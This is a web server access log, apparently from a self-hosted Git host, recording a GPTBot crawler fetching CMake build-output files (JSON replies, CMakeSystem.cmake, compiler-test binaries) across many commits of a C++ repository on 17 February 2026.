"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12860] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12597] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10790] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19986] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13604] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11590] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23185] [Gzip 19.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11618] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23183] [Gzip 19.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12465] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13531] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11617] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19986] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10766] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11040] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23185] [Gzip 19.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 